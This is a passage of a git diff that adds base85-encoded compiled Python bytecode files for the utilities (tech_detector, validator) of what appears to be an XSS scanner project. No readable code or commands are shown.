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
HY4iUNU`T~5

literal 0
HcmV?d00001

diff --git a/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc b/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..ada551544d197152093095d375273b849e471083
GIT binary patch
literal 16974
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
Qe~8@@LE)DeI<iXt4<z&1iU0rr

literal 0
HcmV?d00001

diff --git a/xss_scanner/utils/__pycache__/validator.cpython-313.pyc b/xss_scanner/utils/__pycache__/validator.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..64d2464d642d44720b510171204b0b82d18ba9f4
GIT binary patch
literal 6909
zcmeHMYj9J?72bQV-jXGOWrQDqWS%0$DaHmPAYhwkAx>&p2?-7!MV4g+Be{DeFd<Oq
zZIfhVnh;D%Y7;^tng?pj6c-#4(sU-BX=mi()Xv52WG2X%Uon`;Way9d?0rcxCb(&S
zX2;sQkF#fA=X`t4@mN-t4ngW!^mqTcX$XBuDpF#^!q_uVID}jXBNyeOH&dA6zci-#
zFM}EQGMg1YQ(~nJ)iTuviACyLh+K+NN~mMCOPPnT#+Bt#<)OzYtaYiOu5)Q1*SoZk
z8(ccbvs`+}jV=S^CO_>kM#_MLE*X7l_)z@nZ(kfa_2h8uSn~D5U-iB?a=L5e^l_o_
z$}6$qwlgE=Urs)I;>v5!2=uzEWcDft#c3kAso8^BAE$3&**ezi2?l-GE3S@TqZV?q
z|FMUm^$>ES1$;9?^-%XyZd9F4E%v!+X@@d(9zxq_u^Uw@rBdqaV%*3GXS0Nn#@c}Y
zOteic(YTS+6QtZ!wMJ@BegB8ql>BU}@w54LcC?L`1j1E~JVgiv={u}k&GXW1%aT^&
zmiKQ&OXS<Op;^eK4btVbpAx<eR0CSY%t8&6Lm#Pw(K_+ke*OM%_w(-REyJCsk{xdi
zA8j8#)TYywV?XQE*&u~I*zXHFZC4~hzExN43rBEJq<J(HYI52#IIMTjH`R^daI^F7
zyKibpfrV1U0y7UE?uI!)M#!w)y~*CF(-xTz9UxKAl>G47tH;h=K6gSKJ>2%HG(6ec
zntbzg#5j%#3^xhGuk@Zx#t$aDx{@6)MW#R-@Edvi`0#H!l5hTQ<n#%r?IvSeWUHz<
zspfPnY%R?04ul&yRa40C_hC-G+k=CFpdS-C<WxalxGCi2wCh^DzUFWs6yz8-j2#T8
z5>AEF@giMc2g1!!K9-DvBjYw!I&0mm53{w!%N7?etz8@19c&7D>e<?@E?1pPko`qF
zJ%M0tnljWz!ht5Xc9*9qQ11zca8dIf&Lq}+b;69893a^&djhgn^tA;UrVg4cqbm3g
z=nMMv1&J9Y1NzcFed&<K7&W#V6S<3G4Y93>(%OXek$%l~o?5NU8OoW_*>EvuZkuk<
zlsjOu!QYT!YP71os&jj6eXK0LI+0)5Z&*8+J$+P(%=S?uGMK-)p+$zAF+{_7iT%RZ
z(%6Fd?9<*J`yU$OTNBoM`ZcSEOqTzQDuL|gm=#ufwzRw$T`1O7EMzXMoKrEE`FO4p
